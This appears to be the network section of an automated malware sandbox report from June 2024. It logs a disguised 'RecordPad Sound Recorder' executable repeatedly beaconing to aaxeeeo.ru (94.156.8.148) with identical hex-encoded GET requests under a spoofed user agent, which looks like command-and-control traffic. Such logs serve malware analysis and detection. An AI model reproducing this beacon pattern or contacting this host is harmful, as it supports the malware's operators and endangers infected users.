                                                                                    Date: Tue, 11 Jun 2024 17:42:56 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 32 62 36 0d 0a 36 37 62 36 39 63 39 35 33 38 30 34 62 32 36 62 35 36 35 66 65 39 35 62 33 32 31 62 64 31 39 61 35 35 66 66 38 37 63 39 66 35 31 64 30 31 65 64 61 34 34 61 65 38 30 30 64 32 66 33 38 38 65 64 39 34 38 63 34 63 38 34 34 64 63 64 65 34 64 64 33 32 32 39 61 66 34 35 65 30 64 35 63 37 31 66 32 61 65 61 37 37 35 38 61 36 37 34 66 65 36 32 62 37 33 31 35 30 63 33 65 30 64 30 30 61 64 65 34 32 63 39 37 62 62 61 31 31 66 66 33 33 38 31 32 66 65 31 30 65 61 34 36 37 63 33 34 64 62 61 65 33 35 30 65 63 35 64 37 66 34 39 65 39 32 34 36 37 39 65 33 61 36 66 38 62 65 31 31 37 63 30 66 31 39 34 39 39 33 38 64 33 36 65 39 66 31 36 64 32 35 31 38 61 32 61 62 36 35 32 62 32 65 31 35 61 33 66 65 63 37 62 64 34 65 33 37 30 62 62 39 31 65 64 64 37 34 66 65 63 33 66 63 39 31 36 33 35 35 36 35 32 32 38 66 64 32 64 37 32 31 36 36 37 62 64 65 62 39 33 66 66 38 30 32 38 35 62 65 34 35 63 37 62 32 31 66 65 32 31 35 35 66 35 65 32 65 36 38 64 66 64 32 30 37 39 61 31 65 38 35 39 39 33 38 63 66 31 37 62 32 37 31 [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 52623 | 94.156.8.14 | 80 | 1412 | C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
Timestamp | Bytes transferred | Direction | Data
Jun 11, 2024 19:42:57.171207905 CEST | 325 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:42:58.559915066 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:42:58 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 52624 | 94.156.8.148 | 80 | 1412 | C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
Timestamp | Bytes transferred | Direction | Data
Jun 11, 2024 19:42:58.732763052 CEST | 325 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
Host: aaxeeeo.ru
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jun 11, 2024 19:43:00.105539083 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 11 Jun 2024 17:42:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 52625 | 94.156.8.148 | 80 | 1412 | C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
Timestamp | Bytes transferred | Direction | Data
Jun 11, 2024 19:43:00.233903885 CEST | 325 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
Host: aaxeeeo.ru
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jun 11, 2024 19:43:01.623615980 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 11 Jun 2024 17:43:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 52626 | 94.156.8.148 | 80 | 1412 | C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
Timestamp | Bytes transferred | Direction | Data
Jun 11, 2024 19:43:01.749475956 CEST | 325 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
Host: aaxeeeo.ru
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jun 11, 2024 19:43:03.654938936 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 11 Jun 2024 17:43:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 52627 | 94.156.8.148 | 80 | 1412 | C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
Timestamp | Bytes transferred | Direction | Data
Jun 11, 2024 19:43:03.785664082 CEST | 325 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
Host: aaxeeeo.ru
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jun 11, 2024 19:43:04.979623079 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 11 Jun 2024 17:43:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Jun 11, 2024 19:43:05.086605072 CEST | 325 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
Host: aaxeeeo.ru
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jun 11, 2024 19:43:05.556149006 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 11 Jun 2024 17:43:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Jun 11, 2024 19:43:05.666289091 CEST | 325 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
Host: aaxeeeo.ru
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jun 11, 2024 19:43:06.142509937 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 11 Jun 2024 17:43:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 52628 | 94.156.8.148 | 80 | 1412 | C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
Timestamp | Bytes transferred | Direction | Data
Jun 11, 2024 19:43:06.376940966 CEST | 325 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
Host: aaxeeeo.ru
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jun 11, 2024 19:43:07.457345963 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 11 Jun 2024 17:43:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 52629 | 94.156.8.148 | 80 | 1412 | C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
Timestamp | Bytes transferred | Direction | Data
Jun 11, 2024 19:43:07.601991892 CEST | 325 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
Host: aaxeeeo.ru
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jun 11, 2024 19:43:08.691147089 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 11 Jun 2024 17:43:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 52630 | 94.156.8.148 | 80 | 1412 | C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
Timestamp | Bytes transferred | Direction | Data
Jun 11, 2024 19:43:08.901350975 CEST | 325 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
Host: aaxeeeo.ru
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jun 11, 2024 19:43:10.046665907 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 11 Jun 2024 17:43:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 52631 | 94.156.8.148 | 80 | 1412 | C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
Timestamp | Bytes transferred | Direction | Data
Jun 11, 2024 19:43:10.177838087 CEST | 325 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
Host: aaxeeeo.ru
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jun 11, 2024 19:43:11.368122101 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 11 Jun 2024 17:43:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 52632 | 94.156.8.148 | 80 | 1412 | C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
Timestamp | Bytes transferred | Direction | Data
Jun 11, 2024 19:43:11.744384050 CEST | 325 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
Host: aaxeeeo.ru
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jun 11, 2024 19:43:12.903089046 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 11 Jun 2024 17:43:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 52633 | 94.156.8.148 | 80 | 1412 | C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
Timestamp | Bytes transferred | Direction | Data
Jun 11, 2024 19:43:13.030652046 CEST | 325 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
Host: aaxeeeo.ru
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jun 11, 2024 19:43:14.214755058 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 11 Jun 2024 17:43:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 52634 | 94.156.8.148 | 80 | 1412 | C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
Timestamp | Bytes transferred | Direction | Data
Jun 11, 2024 19:43:14.391720057 CEST | 325 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
Host: aaxeeeo.ru
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jun 11, 2024 19:43:15.523540974 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 11 Jun 2024 17:43:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Jun 11, 2024 19:43:15.633502007 CEST | 325 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
Host: aaxeeeo.ru
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jun 11, 2024 19:43:16.122909069 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 11 Jun 2024 17:43:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 52635 | 94.156.8.148 | 80 | 1412 | C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
Timestamp | Bytes transferred | Direction | Data
Jun 11, 2024 19:43:16.249164104 CEST | 325 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
Host: aaxeeeo.ru
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jun 11, 2024 19:43:17.387645960 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 11 Jun 2024 17:43:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    15192.168.2.55263694.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:17.515047073 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:18.622528076 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:18 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    16192.168.2.55263794.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:18.748450994 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:19.964620113 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:19 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    17192.168.2.55263894.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:20.092413902 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:21.310786963 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:21 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    18192.168.2.55263994.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:21.435794115 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:22.622318983 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:22 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20
                                                                                    Jun 11, 2024 19:43:22.730067968 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:23.212305069 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:23 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20
                                                                                    Jun 11, 2024 19:43:23.321052074 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:23.790903091 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:23 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20
                                                                                    Jun 11, 2024 19:43:23.899061918 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:24.357000113 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:24 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    19192.168.2.55264094.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:24.599278927 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:25.743144035 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:25 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20
